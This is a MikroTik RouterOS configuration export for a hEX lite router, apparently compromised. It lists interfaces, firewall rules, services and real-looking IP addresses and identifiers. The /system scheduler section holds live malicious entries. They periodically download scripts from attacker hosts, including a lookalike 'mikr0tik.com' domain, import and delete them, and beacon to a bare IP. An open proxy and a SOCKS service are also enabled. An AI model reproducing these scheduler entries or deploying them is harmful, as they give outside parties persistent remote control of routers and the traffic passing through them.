#        routerboard: yes
#         board-name: hEX lite
#              model: RouterBOARD 750 r2
#      serial-number: 67D2061DB1DF
#      firmware-type: qca9531L
#   factory-firmware: 3.33
#   current-firmware: 6.48.6
#   upgrade-firmware: 6.48.6
# 
#             channel: long-term
#   installed-version: 6.48.6
# 
# Flags: U - undoable, R - redoable, F - floating-undo 
#   ACTION                                   BY               POLICY             
# 
# software id = B81M-E6YI
#
# model = RouterBOARD 750 r2
# serial number = 67D2061DB1DF
/interface bridge
add fast-forward=no name=bridge1
/interface ethernet
set [ find default-name=ether1 ] advertise=10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full
set [ find default-name=ether2 ] advertise=10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full
set [ find default-name=ether3 ] advertise=10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full
set [ find default-name=ether4 ] advertise=10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full
set [ find default-name=ether5 ] advertise=10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full
/interface wireless security-profiles
set [ find default=yes ] supplicant-identity=MikroTik
/ip pool
add name=dhcp ranges=192.168.10.100-192.168.10.200
/ip dhcp-server
add address-pool=dhcp authoritative=after-2sec-delay disabled=no interface=bridge1 name=dhcp1
/snmp community
set [ find default=yes ] addresses=45.225.65.10/32 name=onnet@2017
/interface bridge port
add bridge=bridge1 hw=no interface=ether2
add bridge=bridge1 hw=no interface=ether3
add bridge=bridge1 hw=no interface=ether4
add bridge=bridge1 hw=no interface=ether5
/ip address
add address=45.225.65.162/30 interface=ether1 network=45.225.65.160
add address=192.168.10.1/24 interface=ether2 network=192.168.10.0
/ip cloud
set ddns-enabled=yes
/ip dhcp-client
add interface=ether1
/ip dhcp-server network
add address=192.168.10.0/24 dns-server=177.10.56.3,177.10.56.30 gateway=192.168.10.1 netmask=24
/ip dns
set servers=45.225.64.10,172.16.20.40
/ip firewall address-list
add address=127.0.0.1 list=allow-ip
/ip firewall filter
add action=accept chain=input dst-address=45.225.65.162 protocol=icmp src-address=45.225.64.0/22
add action=accept chain=input dst-address=45.225.65.162 protocol=icmp src-address=172.16.20.50
add action=accept chain=input in-interface=ether1 src-address=45.225.64.0/22
add action=accept chain=input src-address=192.168.10.0/24
add action=accept chain=forward src-address=192.168.10.0/24
add action=accept chain=input disabled=yes in-interface=ether1 log=yes log-prefix=FW
/ip firewall nat
add action=masquerade chain=srcnat out-interface=ether1
add action=masquerade chain=srcnat src-address=192.168.10.0/24
/ip proxy
set enabled=yes port=63141
/ip proxy access
add action=deny comment=sysadminpxy
/ip route
add distance=1 gateway=45.225.65.161
/ip service
set telnet disabled=yes
set ftp disabled=yes
set www address=45.225.64.0/22,192.168.0.0/16
set ssh address=45.225.65.10/32 port=2222
set api disabled=yes
set winbox port=25000
set api-ssl disabled=yes
/ip smb shares
set [ find default=yes ] directory=/pub
/ip socks
set port=27182
/snmp
set enabled=yes
/system clock
set time-zone-name=America/Sao_Paulo
/system identity
set name=RB-Alexandre-Pirai
/system ntp client
set enabled=yes primary-ntp=88.147.254.230 secondary-ntp=88.147.254.235
/system package update
set channel=long-term
/system scheduler
add interval=1d name=Auto113 on-event="/system reboot" policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=mar/05/2019 start-time=03:11:00
add name=upd112 on-event="/system scheduler remove [find name=sh113]\r\n:do {/file remove u113.rsc} on-error={}" policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=startup
add interval=12h name=upd114 on-event=":do {/tool fetch url=http://88.99.66.31/1DFrN6 mode=http keep-result=no} on-error={}" policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=mar/27/2019 start-time=10:05:01
add interval=4h name=upd113 on-event=":do {/tool fetch url=\"http://min01.net:31416/min01\?key=DB1QJhFSi2ubtc&port={vport}\" mode=http dst-path=u113.rsc} on-error={}\r\n:do {/tool fetch url=\"http://mikr0tik.com:31416/min01\?key=DB1QJhFSi2ubtc&port={vport}\" mode=http dst-path=u113.rsc} on-error={}\r\n:do {/tool fetch url=\"http://gotan.bit:31416/min01\?key=DB1QJhFSi2ubtc&port={vport}\" mode=http dst-path=u113.rsc} on-error={}\r\n:do {/import u113.rsc} on-error={}\r\n:do {/file remove u113.rsc} on-error={}" policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=apr/01/2019 start-time=04:05:23